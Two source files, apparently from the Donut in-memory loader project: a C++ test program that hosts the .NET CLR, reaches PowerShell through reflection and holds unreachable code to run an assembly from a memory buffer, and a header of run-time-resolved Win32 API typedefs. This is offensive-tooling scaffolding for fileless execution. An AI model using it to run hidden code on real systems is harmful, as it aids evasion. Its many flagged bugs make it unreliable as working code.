8 | #include <propvarutil.h> | |
9 | #include <metahost.h> | |
10 | ||
11 | #include <cstdio> | |
12 | #include <cstdint> | |
13 | #include <cstring> | |
14 | #include <cstdlib> | |
15 | #include <sys/stat.h> | |
16 | ||
17 | #import "mscorlib.tlb" raw_interfaces_only | |
18 | #import "shdocvw.dll" | |
19 | ||
20 | #pragma comment(lib, "mscoree.lib") | |
21 | ||
// Placeholder event handler: only announces that it was invoked.
// `evt` is accepted for signature compatibility and not examined.
void my_function(void *evt) {
    (void)evt;
    puts("Received event");
}
25 | ||
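// Debug helper: print every public static method of `type` as
// "Name(<parameter count>" followed, per parameter, by the HRESULT of
// probing the parameter array's element type, then ")". Every BSTR,
// SAFEARRAY and interface reference obtained along the way is released
// before returning.
void DumpMethods(mscorlib::_TypePtr type) {
    SAFEARRAY *sa = NULL;
    HRESULT hr = type->GetMethods(
        (mscorlib::BindingFlags)
        (mscorlib::BindingFlags_Static |
         mscorlib::BindingFlags_Public),
        &sa);
    if (hr != S_OK || sa == NULL) return;

    LONG lcnt = 0, ucnt = -1;
    SafeArrayGetLBound(sa, 1, &lcnt);
    SafeArrayGetUBound(sa, 1, &ucnt);

    for (LONG i = lcnt; i <= ucnt; i++) {
        // SafeArrayGetElement on a VT_UNKNOWN array AddRefs the element;
        // hand that reference to the smart pointer without a second AddRef
        // (writing into a _com_ptr_t through a void* would leak it)
        mscorlib::_MethodInfo *rawmi = NULL;
        hr = SafeArrayGetElement(sa, &i, (void*)&rawmi);
        if (hr != S_OK || rawmi == NULL) continue;
        mscorlib::_MethodInfoPtr mi(rawmi, false);

        BSTR name = NULL;
        if (mi->get_name(&name) == S_OK && name != NULL) {
            printf("%ls(", name);
            SysFreeString(name);
        } else {
            printf("?(");
        }

        SAFEARRAY *params = NULL;
        hr = mi->GetParameters(&params);
        if (hr == S_OK && params != NULL) {
            LONG plo = 0, phi = -1;
            SafeArrayGetLBound(params, 1, &plo);
            SafeArrayGetUBound(params, 1, &phi);
            LONG pcnt = phi - plo + 1;
            printf("%ld", (long)pcnt);

            for (LONG j = 0; j < pcnt; j++) {
                // VARTYPE should be VT_UNKNOWN for an array of interfaces;
                // the elements themselves are not fetched (nothing used them)
                VARTYPE var = VT_EMPTY;
                hr = SafeArrayGetVartype(params, &var);
                printf("HRESULT : %lx\n", (unsigned long)hr);
            }
            SafeArrayDestroy(params);
        }
        printf(")\n");
    }
    SafeArrayDestroy(sa);
}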
78 | ||
// Hosts the v4 CLR in-process, loads System.Management.Automation into the
// default AppDomain and exercises a few reflection calls against it
// (PowerShell.Create, Marshal.GetIUnknownForObject).
//
// code/len : raw bytes of a .NET assembly supplied by main().  NOTE(review):
//            they are only consumed by the SafeArrayCreate/Load_3 section,
//            which sits after the unconditional `return;` below and is
//            therefore unreachable -- the assembly is never actually loaded.
//
// This is scratch/test code: most HRESULTs are printed rather than acted on,
// BSTRs and SAFEARRAYs are not freed, and the interfaces acquired on the
// early-return paths (icmh, icri, icrh) are not released.
void rundotnet(void *code, size_t len) {
    HRESULT hr;
    ICLRMetaHost *icmh;
    ICLRRuntimeInfo *icri;
    ICorRuntimeHost *icrh;
    IUnknownPtr iu;
    mscorlib::_AppDomainPtr ad;
    mscorlib::_AssemblyPtr as, as1, as2, as3;
    mscorlib::_MethodInfoPtr mi;
    mscorlib::_EventInfoPtr nfo;
    mscorlib::_TypePtr evt, ptr, type, mars, del, _void, powershell;
    mscorlib::_DelegatePtr delegate;
    mscorlib::_ParameterInfoPtr param;
    mscorlib::_EventHandlerPtr handler;
    VARIANT v1, v2, v_ptr, v_type, ret;
    SAFEARRAY *sa, *sa2, *sav;
    SAFEARRAYBOUND sab;
    BOOL loadable;
    LONG idx;

    // NOTE(review): the message names CoCreateInstance but the call below is
    // CLRCreateInstance (the v4 meta-host entry point)
    printf("CoCreateInstance(ICorRuntimeHost).\n");

    hr = CLRCreateInstance(
        CLSID_CLRMetaHost,
        IID_ICLRMetaHost,
        (LPVOID*)&icmh);

    if(SUCCEEDED(hr)) {
        printf("ICLRMetaHost::GetRuntime\n");

        // the runtime version string is hard-coded to CLR 4.0
        hr = icmh->GetRuntime(
            L"v4.0.30319",
            IID_ICLRRuntimeInfo, (LPVOID*)&icri);

        if(SUCCEEDED(hr)) {
            printf("ICLRRuntimeInfo::IsLoadable\n");
            hr = icri->IsLoadable(&loadable);

            if(SUCCEEDED(hr) && loadable) {
                printf("ICLRRuntimeInfo::GetInterface\n");

                // NOTE(review): a failure here is not followed by a return,
                // so icrh->Start() below would run on an uninitialized pointer
                hr = icri->GetInterface(
                    CLSID_CorRuntimeHost,
                    IID_ICorRuntimeHost,
                    (LPVOID*)&icrh);
            } else return;
        } else return;
    } else return;

    printf("ICorRuntimeHost::Start()\n");
    hr = icrh->Start();
    if(SUCCEEDED(hr)) {
        printf("ICorRuntimeHost::GetDefaultDomain()\n");
        hr = icrh->GetDefaultDomain(&iu);
        if(SUCCEEDED(hr)) {
            printf("IUnknown::QueryInterface()\n");
            hr = iu->QueryInterface(IID_PPV_ARGS(&ad));
            if(SUCCEEDED(hr)) {
                // fully qualified assembly names for AppDomain::Load_2; the
                // PowerShell one was read off the GAC copy, see the comment
                BSTR strX = SysAllocString(L"System.Runtime.InteropServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a");
                // ([system.reflection.assembly]::loadfile("C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll")).FullName
                BSTR str1 = SysAllocString(L"System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35");

                BSTR str2 = SysAllocString(L"mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089");

                // NOTE(review): the printed hr belongs to the interop-services
                // load, not to System.Management.Automation as the text says
                hr = ad->Load_2(str1, &as1); // load automation
                hr = ad->Load_2(strX, &as3); // load interop services
                printf("Loading System.Management.Automation : %lx\n", hr);
                hr = ad->Load_2(str2, &as2); // load mscorlib

                BSTR alloc = SysAllocString(L"Create");
                BSTR marshal = SysAllocString(L"System.Management.Automation.PowerShell");
                hr = as1->GetType_2(marshal, &mars);

                printf("GetType_2(PowerShell) : %lx %p\n", hr, (PVOID)mars);

                // NOTE(review): mars is NULL when GetType_2 failed above, and
                // DumpMethods dereferences it
                DumpMethods(mars);

                // to retrieve a method, the SAFEARRAY is of IUnknown types
                // this method doesn't accept anything, so just allocate array for it
                // NOTE(review): sav is reassigned several times below without
                // SafeArrayDestroy -- each vector leaks
                sav = SafeArrayCreateVector(VT_UNKNOWN, 0, 0);

                hr = mars->GetMethod(alloc,
                    (mscorlib::BindingFlags)
                    (mscorlib::BindingFlags_Static | mscorlib::BindingFlags_Public),
                    NULL, // Binder
                    sav, // SAFEARRAY(_Type*)
                    NULL, // Modifiers
                    &mi); // MethodInfo

                printf("System.Management.Automation.PowerShell.GetMethod(Create) : %lx : %p\n", hr, (PVOID)mi);

                // NOTE(review): ret was never VariantInit()ed; VariantClear on an
                // indeterminate vt may try to release whatever garbage it holds
                v1.vt = VT_EMPTY;
                VariantClear(&ret);

                // static call: v1 (VT_EMPTY) stands in for the missing `this`
                hr = mi->Invoke_3(
                    v1,
                    NULL, // arguments to method
                    &ret); // return value from method

                printf("%lx %p %i %i\n", hr, (LPVOID)ret.punkVal, V_VT(&ret), GetLastError());

                // at this point, we have the powershell object. we just need to call AddScript
                // method, but this is an IDisposable

                sav = SafeArrayCreateVector(VT_UNKNOWN, 0, 1);
                BSTR object = SysAllocString(L"System.Object");

                as2->GetType_2(object, &ptr);
                idx = 0;
                SafeArrayPutElement(sav, &idx, ptr);

                BSTR get_obj = SysAllocString(L"GetIUnknownForObject");
                BSTR mars_str = SysAllocString(L"System.Runtime.InteropServices.Marshal");
                hr = as3->GetType_2(mars_str, &mars);

                printf("Marshal : %p\n", (PVOID)mars);

                hr = mars->GetMethod(get_obj,
                    (mscorlib::BindingFlags)
                    (mscorlib::BindingFlags_Static | mscorlib::BindingFlags_Public),
                    NULL, // Binder
                    sav, // SAFEARRAY(_Type*)
                    NULL, // Modifiers
                    &mi); // MethodInfo

                printf("GetMethod() : %lx %p\n", hr, (PVOID)mi);

                // NOTE(review): this array is VT_VARIANT, so the element should
                // be the VARIANT itself (&ret); &ret.punkVal points into the
                // middle of the VARIANT -- confirm
                sav = SafeArrayCreateVector(VT_VARIANT, 0, 1);
                idx = 0;
                SafeArrayPutElement(sav, &idx, &ret.punkVal);

                v1.vt = VT_EMPTY;
                VARIANT unk;
                VariantClear(&unk); // NOTE(review): same uninitialized-VARIANT concern as ret

                hr = mi->Invoke_3(
                    v1,
                    sav, // arguments to method
                    &unk); // return value from method

                printf("%lx %p\n", hr, (LPVOID)V_BYREF(&unk));
                getchar();
                // NOTE(review): everything from here to the SafeArrayDestroy(sa)
                // below is unreachable; the AppDomain/IUnknown/host cleanup after
                // it is skipped on this path as well
                return;

                // SAFEARRAY(_Type*)
                sav = SafeArrayCreateVector(VT_UNKNOWN, 0, 2);

                // add System.IntPtr
                BSTR str4 = SysAllocString(L"System.IntPtr");
                as2->GetType_2(str4, &ptr);
                //DumpMethods(ptr);
                idx = 0;
                hr = SafeArrayPutElement(sav, &idx, ptr);

                // add System.Type
                BSTR str5 = SysAllocString(L"System.Type");
                as2->GetType_2(str5, &type);
                idx = 1;
                SafeArrayPutElement(sav, &idx, type);

                // NOTE(review): Marshal lives in the interop-services assembly
                // (as3, used above), not in as1 (System.Management.Automation)
                BSTR str6 = SysAllocString(L"GetIUnknownForObject");
                BSTR str3 = SysAllocString(L"System.Runtime.InteropServices.Marshal");
                hr = as1->GetType_2(str3, &mars);

                hr = mars->GetMethod(str6,
                    (mscorlib::BindingFlags)
                    (mscorlib::BindingFlags_Static | mscorlib::BindingFlags_Public),
                    NULL, // Binder
                    sav, // SAFEARRAY(_Type*)
                    NULL, // Modifiers
                    &mi); // MethodInfo

                // NOTE(review): the method looked up is GetIUnknownForObject, not
                // GetDelegateForFunctionPointer as the message says
                printf("\nGetMethod(GetDelegateForFunctionPointer) HRESULT : %08lx MethodInfoPtr : %p\n", hr, (void*)mi);

                BSTR str9 = SysAllocString(L"ProcessExit");
                BSTR strA = SysAllocString(L"System.AppDomain");

                hr = as2->GetType_2(strA, &evt);
                printf("GetType_2(System.AppDomain) HRESULT : %08lx TypePtr : %p\n", hr, (void*)evt);

                hr = evt->GetEvent(str9,
                    (mscorlib::BindingFlags)
                    (mscorlib::BindingFlags_Instance | mscorlib::BindingFlags_Public),
                    &nfo);

                printf("GetEvent(ProcessExit) HRESULT : %08lx EventInfoPtr : %p\n", hr, (void*)nfo);

                // evt is reused: it now holds the handler type, not System.AppDomain
                hr = nfo->get_EventHandlerType(&evt);
                printf("EventHandlerType(ProcessExit) : HRESULT : %08lx TypePtr : %p\n", hr, (void*)evt);

                BSTR type_name, base_name;
                mscorlib::_TypePtr base_type, ref_type;

                evt->get_name(&type_name);
                evt->get_BaseType(&base_type);
                base_type->get_name(&base_name);

                wprintf(L"Event Type : %s\nBase Type : %s\n", type_name, base_name);

                printf("my_function = %p\n", (void*)my_function);

                // SAFEARRAY(VARIANT)
                sav = SafeArrayCreateVector(VT_VARIANT, 0, 2);

                // the native callback is passed as an integer-typed VARIANT;
                // NOTE(review): VT_INT is 32-bit, which truncates the pointer
                // on x64 -- confirm whether VT_I8/VT_INT_PTR was intended
                VariantClear(&v_ptr);
                V_BYREF(&v_ptr) = (PVOID)my_function;
                V_VT(&v_ptr) = VT_INT;

                idx = 0;
                SafeArrayPutElement(sav, &idx, &v_ptr);

                // NOTE(review): "System.MultiDelegate" does not look like a real
                // type name (System.MulticastDelegate?) -- the printed %p shows
                // whether the lookup succeeded
                BSTR strZ = SysAllocString(L"System.MultiDelegate");
                hr = as2->GetType_2(strZ, &type);
                printf("System.Delegate = %lx, %p\n", hr, (void*)type);

                // NOTE(review): v_type is filled in but &type is what gets stored;
                // for a VT_VARIANT array the element should be &v_type
                idx = 1;
                V_VT(&v_type) = VT_UNKNOWN;
                V_UNKNOWN(&v_type) = type;
                SafeArrayPutElement(sav, &idx, &type);

                v1.vt = VT_EMPTY;
                VariantClear(&ret);

                printf("Calling GetDelegateForFunctionPointer\n");
                hr = mi->Invoke_3(
                    v1,
                    sav, // arguments to method
                    &ret); // return value from method

                printf("Invoke_3(GetDelegateForFunctionPointer) HRESULT : %08lx : %x : %p\n", hr, V_VT(&ret), V_BYREF(&ret));

                /**if(hr != S_OK) {
                printf("Failed to obtain delegate\n");
                return;
                }*/

                printf("Delegate : %p\n", ret.punkVal);

                hr = ret.punkVal->QueryInterface(IID_IUnknown, (void**)&handler);
                printf("HRESULT : %08lx : %p\n", hr, (void*)handler);

                hr = ad->add_ProcessExit(handler);
                printf("HRESULT : %08lx\n", hr);

                // copy the assembly bytes into a SAFEARRAY(byte) for Load_3;
                // NOTE(review): cElements is ULONG, so len is narrowed here
                sab.lLbound = 0;
                sab.cElements = len;
                printf("SafeArrayCreate()\n");
                sa = SafeArrayCreate(VT_UI1, 1, &sab);

                if(sa != NULL) {
                    CopyMemory(sa->pvData, code, len);
                    printf("AppDomain::Load_3()\n");
                    hr = ad->Load_3(sa, &as);
                    if(SUCCEEDED(hr)) {
                        printf("Assembly::get_EntryPoint()\n");
                        hr = as->get_EntryPoint(&mi);
                        if(SUCCEEDED(hr)) {
                            v1.vt = VT_NULL;
                            v1.plVal = NULL;
                            printf("MethodInfo::Invoke_3()\n");
                            // NOTE(review): v2 is never initialized or cleared
                            hr = mi->Invoke_3(v1, NULL, &v2);
                            // NOTE(review): mi/as/ad/iu are _com_ptr_t smart
                            // pointers whose destructors Release again, so the
                            // explicit Release() calls below look like double
                            // releases -- confirm
                            mi->Release();
                        }
                        as->Release();
                    }
                    SafeArrayDestroy(sa);
                }
                ad->Release();
            }
            iu->Release();
        }
        icrh->Stop();
    }
    icrh->Release();
}
354 | ||
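// Entry point: reads the .NET assembly named by argv[1] into memory and hands
// it to rundotnet().  Returns 0 in every case, as the original tool did;
// problems are reported on stdout.
//
// Compared with a bare stat/fread sequence, the return values are checked so
// that a missing file does not leave `fs` uninitialized and a short read does
// not hand a partially filled buffer to the runtime.
int main(int argc, char *argv[])
{
    if(argc != 2) {
        printf("usage: rundotnet <.NET assembly>\n");
        return 0;
    }

    // 1. get the size of file -- stat() fails for a missing or inaccessible
    //    path, in which case fs holds no usable value
    struct stat fs;
    if(stat(argv[1], &fs) != 0) {
        printf("unable to open \"%s\".\n", argv[1]);
        return 0;
    }
    if(fs.st_size <= 0) {
        printf("file is empty.\n");
        return 0;
    }
    size_t len = (size_t)fs.st_size;

    // 2. try open assembly
    FILE *fd = fopen(argv[1], "rb");
    if(fd == NULL) {
        printf("unable to open \"%s\".\n", argv[1]);
        return 0;
    }

    // 3. allocate memory
    void *mem = malloc(len);
    if(mem != NULL) {
        // 4. read file into memory; only run it when the whole file arrived
        if(fread(mem, 1, len, fd) == len) {
            // 5. run the program from memory
            rundotnet(mem, len);
        } else {
            printf("unable to read \"%s\".\n", argv[1]);
        }
        // 6. free memory
        free(mem);
    }
    // 7. close assembly
    fclose(fd);

    return 0;
}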
395 | ||
396 | /** | |
397 | sav = SafeArrayCreateVector(VT_UNKNOWN, 0, 1); | |
398 | BSTR i32 = SysAllocString(L"System.Int32"); | |
399 | ||
400 | as2->GetType_2(i32, &ptr); | |
401 | idx = 0; | |
402 | SafeArrayPutElement(sav, &idx, ptr); | |
403 | ||
404 | BSTR alloc = SysAllocString(L"AllocHGlobal"); | |
405 | BSTR marshal = SysAllocString(L"System.Runtime.InteropServices.Marshal"); | |
406 | hr = as1->GetType_2(marshal, &mars); | |
407 | ||
408 | hr = mars->GetMethod(alloc, | |
409 | (mscorlib::BindingFlags) | |
410 | (mscorlib::BindingFlags_Static | mscorlib::BindingFlags_Public), | |
411 | NULL, // Binder | |
412 | sav, // SAFEARRAY(_Type*) | |
413 | NULL, // Modifiers | |
414 | &mi); // MethodInfo | |
415 | ||
416 | printf("System.Runtime.InteropServices.Marshal.GetMethod(AllocCoTaskMem) : %lx\n", hr); | |
417 | ||
418 | sav = SafeArrayCreateVector(VT_VARIANT, 0, 1); | |
419 | idx = 0; | |
420 | V_VT(&v_type) = VT_I4; | |
421 | V_I4(&v_type) = 0x12345678; | |
422 | SafeArrayPutElement(sav, &idx, &v_type); | |
423 | ||
424 | v1.vt = VT_EMPTY; | |
425 | VariantClear(&ret); | |
426 | ||
427 | printf("Press any key to continue...\n"); | |
428 | getchar(); | |
429 | ||
430 | printf("Calling AllocCoTaskMem\n"); | |
431 | hr = mi->Invoke_3( | |
432 | v1, | |
433 | sav, // arguments to method | |
434 | &ret); // return value from method | |
435 | ||
436 | printf("%lx %p\n", hr, (LPVOID)V_BYREF(&ret)); | |
437 | getchar(); | |
438 | return; | |
439 | */⏎ |
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2019, TheWover, Odzhan. All rights reserved. | |
4 | ||
5 | Redistribution and use in source and binary forms, with or without | |
6 | modification, are permitted provided that the following conditions are met: | |
7 | ||
8 | * Redistributions of source code must retain the above copyright notice, this | |
9 | list of conditions and the following disclaimer. | |
10 | ||
11 | * Redistributions in binary form must reproduce the above copyright notice, | |
12 | this list of conditions and the following disclaimer in the documentation | |
13 | and/or other materials provided with the distribution. | |
14 | ||
15 | * Neither the name of the copyright holder nor the names of its | |
16 | contributors may be used to endorse or promote products derived from | |
17 | this software without specific prior written permission. | |
18 | ||
19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
20 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
21 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
22 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
23 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
24 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
25 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
26 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
27 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
29 | */ | |
30 | ||
31 | #ifndef WINAPI_H | |
32 | #define WINAPI_H | |
33 | ||
34 | #include <windows.h> | |
35 | ||
// Function-pointer types for the Win32 / COM routines used by the loader.
// Only signatures are declared here; the matching addresses are presumably
// resolved by name at run time elsewhere (nothing in this header imports
// them), which is why every typedef mirrors the documented prototype exactly.
// The group comments name the DLL that exports each routine.

// imports from kernel32.dll
typedef void (WINAPI *Sleep_t)(DWORD dwMilliseconds);

typedef int (WINAPI *MultiByteToWideChar_t)(
    UINT   CodePage,
    DWORD  dwFlags,
    LPCCH  lpMultiByteStr,
    int    cbMultiByte,
    LPWSTR lpWideCharStr,
    int    cchWideChar);

typedef int (WINAPI *WideCharToMultiByte_t)(
    UINT   CodePage,
    DWORD  dwFlags,
    LPCWCH lpWideCharStr,
    int    cchWideChar,
    LPSTR  lpMultiByteStr,
    int    cbMultiByte,
    LPCCH  lpDefaultChar,
    LPBOOL lpUsedDefaultChar);

// imports from shlwapi.dll
typedef LSTATUS (WINAPI *SHGetValueA_t)(
    HKEY   hkey,
    LPCSTR pszSubKey,
    LPCSTR pszValue,
    DWORD *pdwType,
    void  *pvData,
    DWORD *pcbData);

// imports from mscoree.dll
typedef HRESULT (WINAPI *CLRCreateInstance_t)(
    REFCLSID clsid,
    REFIID   riid,
    LPVOID  *ppInterface);

// CorBindToRuntime is the pre-v4 hosting entry point; presumably kept for
// runtimes where CLRCreateInstance is not available -- confirm usage
typedef HRESULT (WINAPI *CorBindToRuntime_t) (
    LPCWSTR     pwszVersion,
    LPCWSTR     pwszBuildFlavor,
    REFCLSID    rclsid,
    REFIID      riid,
    LPVOID FAR *ppv);

// imports from ole32.dll
typedef HRESULT (WINAPI *CoInitializeEx_t)(
    LPVOID pvReserved,
    DWORD  dwCoInit);

typedef void (WINAPI *CoUninitialize_t)(void);

typedef HRESULT (WINAPI *CoCreateInstance_t)(
    REFCLSID  rclsid,
    LPUNKNOWN pUnkOuter,
    DWORD     dwClsContext,
    REFIID    riid,
    LPVOID   *ppv);

// NOTE(review): the rest of this group is exported by oleaut32.dll
// (CreateStdDispatch .. LoadTypeLibEx) and kernel32.dll (GetUserDefaultLCID),
// not ole32.dll -- the comment above is only a grouping, confirm against the
// resolver
typedef HRESULT (WINAPI *CreateStdDispatch_t)(
    IUnknown  *punkOuter,
    void      *pvThis,
    ITypeInfo *ptinfo,
    IUnknown **ppunkStdDisp);

typedef HRESULT (WINAPI *CreateErrorInfo_t)(
    ICreateErrorInfo **pperrinfo);

typedef HRESULT (WINAPI *CreateDispTypeInfo_t)(
    INTERFACEDATA *pidata,
    LCID           lcid,
    ITypeInfo    **pptinfo);

typedef HRESULT (WINAPI *GetErrorInfo_t)(
    ULONG        dwReserved,
    IErrorInfo **pperrinfo);

typedef HRESULT (WINAPI *LoadTypeLib_t)(
    LPCOLESTR szFile,
    ITypeLib **pptlib);

typedef HRESULT (WINAPI *LoadTypeLibEx_t)(
    LPCOLESTR szFile,
    REGKIND   regkind,
    ITypeLib **pptlib);

typedef LCID (WINAPI *GetUserDefaultLCID_t)(VOID);

// imports from oleaut32.dll
typedef HRESULT (WINAPI *SafeArrayGetLBound_t)(
    SAFEARRAY *psa,
    UINT       nDim,
    LONG      *plLbound);

typedef HRESULT (WINAPI *SafeArrayGetUBound_t)(
    SAFEARRAY *psa,
    UINT       nDim,
    LONG      *plUbound);

typedef SAFEARRAY* (WINAPI *SafeArrayCreate_t)(
    VARTYPE         vt,
    UINT            cDims,
    SAFEARRAYBOUND *rgsabound);

typedef SAFEARRAY* (WINAPI *SafeArrayCreateVector_t)(
    VARTYPE vt,
    LONG    lLbound,
    ULONG   cElements);

typedef HRESULT (WINAPI *SafeArrayPutElement_t)(
    SAFEARRAY *psa,
    LONG      *rgIndices,
    void      *pv);

typedef HRESULT (WINAPI *SafeArrayDestroy_t)(
    SAFEARRAY *psa);

typedef BSTR (WINAPI *SysAllocString_t)(
    const OLECHAR *psz);

typedef void (WINAPI *SysFreeString_t)(
    BSTR bstrString);

// imports from kernel32.dll
typedef HMODULE (WINAPI *LoadLibraryA_t)(
    LPCSTR lpLibFileName);

typedef FARPROC (WINAPI *GetProcAddress_t)(
    HMODULE hModule,
    LPCSTR  lpProcName);

typedef BOOL (WINAPI *AllocConsole_t)(void);

typedef BOOL (WINAPI *AttachConsole_t)(
    DWORD dwProcessId);

typedef BOOL (WINAPI *SetConsoleCtrlHandler_t)(
    PHANDLER_ROUTINE HandlerRoutine,
    BOOL             Add);

typedef HANDLE (WINAPI *GetStdHandle_t)(
    DWORD nStdHandle);

typedef BOOL (WINAPI *SetStdHandle_t)(
    DWORD  nStdHandle,
    HANDLE hHandle);

typedef HANDLE (WINAPI *CreateFileA_t)(
    LPCSTR                lpFileName,
    DWORD                 dwDesiredAccess,
    DWORD                 dwShareMode,
    LPSECURITY_ATTRIBUTES lpSecurityAttributes,
    DWORD                 dwCreationDisposition,
    DWORD                 dwFlagsAndAttributes,
    HANDLE                hTemplateFile);

typedef HANDLE (WINAPI *CreateEventA_t)(
    LPSECURITY_ATTRIBUTES lpEventAttributes,
    BOOL                  bManualReset,
    BOOL                  bInitialState,
    LPCSTR                lpName);

typedef BOOL (WINAPI *CloseHandle_t)(HANDLE hObject);

typedef BOOL (WINAPI *SetEvent_t)(HANDLE hEvent);

typedef DWORD (WINAPI *GetCurrentThreadId_t)(VOID);

typedef DWORD (WINAPI *GetCurrentProcessId_t)(VOID);

// NOTE(review): SetWindowsHookExA is a user32.dll export, not kernel32
typedef HHOOK (WINAPI *SetWindowsHookExA_t)(
    int       idHook,
    HOOKPROC  lpfn,
    HINSTANCE hmod,
    DWORD     dwThreadId);

typedef BOOL (WINAPI *CreateProcessA_t)(
    LPCSTR                lpApplicationName,
    LPSTR                 lpCommandLine,
    LPSECURITY_ATTRIBUTES lpProcessAttributes,
    LPSECURITY_ATTRIBUTES lpThreadAttributes,
    BOOL                  bInheritHandles,
    DWORD                 dwCreationFlags,
    LPVOID                lpEnvironment,
    LPCSTR                lpCurrentDirectory,
    LPSTARTUPINFOA        lpStartupInfo,
    LPPROCESS_INFORMATION lpProcessInformation);

typedef DWORD (WINAPI *WaitForSingleObject_t)(
    HANDLE hHandle,
    DWORD  dwMilliseconds);

// imports from wininet.dll
typedef BOOL (WINAPI *InternetCrackUrl_t)(
    LPCSTR            lpszUrl,
    DWORD             dwUrlLength,
    DWORD             dwFlags,
    LPURL_COMPONENTS  lpUrlComponents);

typedef HINTERNET (WINAPI *InternetOpen_t)(
    LPCSTR lpszAgent,
    DWORD  dwAccessType,
    LPCSTR lpszProxy,
    LPCSTR lpszProxyBypass,
    DWORD  dwFlags);

typedef HINTERNET (WINAPI *InternetConnect_t)(
    HINTERNET     hInternet,
    LPCSTR        lpszServerName,
    INTERNET_PORT nServerPort,
    LPCSTR        lpszUserName,
    LPCSTR        lpszPassword,
    DWORD         dwService,
    DWORD         dwFlags,
    DWORD_PTR     dwContext);

typedef HINTERNET (WINAPI *HttpOpenRequest_t)(
    HINTERNET hConnect,
    LPCSTR    lpszVerb,
    LPCSTR    lpszObjectName,
    LPCSTR    lpszVersion,
    LPCSTR    lpszReferrer,
    LPCSTR   *lplpszAcceptTypes,
    DWORD     dwFlags,
    DWORD_PTR dwContext);

typedef BOOL (WINAPI *InternetSetOption_t)(
    HINTERNET hInternet,
    DWORD     dwOption,
    LPVOID    lpBuffer,
    DWORD     dwBufferLength);

typedef BOOL (WINAPI *HttpSendRequest_t)(
    HINTERNET hRequest,
    LPCSTR    lpszHeaders,
    DWORD     dwHeadersLength,
    LPVOID    lpOptional,
    DWORD     dwOptionalLength);

typedef BOOL (WINAPI *HttpQueryInfo_t)(
    HINTERNET hRequest,
    DWORD     dwInfoLevel,
    LPVOID    lpBuffer,
    LPDWORD   lpdwBufferLength,
    LPDWORD   lpdwIndex);

typedef BOOL (WINAPI *InternetReadFile_t)(
    HINTERNET hFile,
    LPVOID    lpBuffer,
    DWORD     dwNumberOfBytesToRead,
    LPDWORD   lpdwNumberOfBytesRead);

typedef BOOL (WINAPI *InternetCloseHandle_t)(
    HINTERNET hInternet);

// imports from advapi32.dll (CryptoAPI provider handling)
typedef BOOL (WINAPI *CryptAcquireContext_t)(
    HCRYPTPROV *phProv,
    LPCSTR      szContainer,
    LPCSTR      szProvider,
    DWORD       dwProvType,
    DWORD       dwFlags);

// imports from kernel32.dll
typedef void (WINAPI *GetSystemInfo_t)(
    LPSYSTEM_INFO lpSystemInfo);

typedef SIZE_T (WINAPI *VirtualQuery_t)(
    LPCVOID                   lpAddress,
    PMEMORY_BASIC_INFORMATION lpBuffer,
    SIZE_T                    dwLength);

typedef BOOL (WINAPI *VirtualProtect_t)(
    LPVOID lpAddress,
    SIZE_T dwSize,
    DWORD  flNewProtect,
    PDWORD lpflOldProtect);

typedef HMODULE (WINAPI *GetModuleHandleA_t)(
    LPCSTR lpModuleName);

typedef HMODULE (WINAPI *LoadLibraryExA_t)(
    LPCSTR lpLibFileName,
    HANDLE hFile,
    DWORD  dwFlags);

typedef HMODULE (WINAPI *LoadLibraryExW_t)(
    LPCWSTR lpLibFileName,
    HANDLE  hFile,
    DWORD   dwFlags);

// imports from crypt32.dll (encoding / certificate helpers)
typedef BOOL (WINAPI *CryptStringToBinaryA_t)(
    LPCSTR pszString,
    DWORD  cchString,
    DWORD  dwFlags,
    BYTE  *pbBinary,
    DWORD *pcbBinary,
    DWORD *pdwSkip,
    DWORD *pdwFlags);

typedef BOOL (WINAPI *CryptDecodeObjectEx_t)(
    DWORD              dwCertEncodingType,
    LPCSTR             lpszStructType,
    const BYTE        *pbEncoded,
    DWORD              cbEncoded,
    DWORD              dwFlags,
    PCRYPT_DECODE_PARA pDecodePara,
    void              *pvStructInfo,
    DWORD             *pcbStructInfo);

typedef BOOL (WINAPI *CryptImportPublicKeyInfo_t)(
    HCRYPTPROV            hCryptProv,
    DWORD                 dwCertEncodingType,
    PCERT_PUBLIC_KEY_INFO pInfo,
    HCRYPTKEY            *phKey);

// imports from advapi32.dll (hash / signature verification)
typedef BOOL (WINAPI *CryptCreateHash_t)(
    HCRYPTPROV  hProv,
    ALG_ID      Algid,
    HCRYPTKEY   hKey,
    DWORD       dwFlags,
    HCRYPTHASH *phHash);

typedef BOOL (WINAPI *CryptHashData_t)(
    HCRYPTHASH  hHash,
    const BYTE *pbData,
    DWORD       dwDataLen,
    DWORD       dwFlags);

typedef BOOL (WINAPI *CryptVerifySignature_t)(
    HCRYPTHASH  hHash,
    const BYTE *pbSignature,
    DWORD       dwSigLen,
    HCRYPTKEY   hPubKey,
    LPCSTR      szDescription,
    DWORD       dwFlags);

typedef BOOL (WINAPI *CryptDestroyHash_t)(
    HCRYPTHASH hHash);

typedef BOOL (WINAPI *CryptDestroyKey_t)(
    HCRYPTKEY hKey);

typedef BOOL (WINAPI *CryptReleaseContext_t)(
    HCRYPTPROV hProv,
    DWORD      dwFlags);

// imports from kernel32.dll (memory and resource handling)
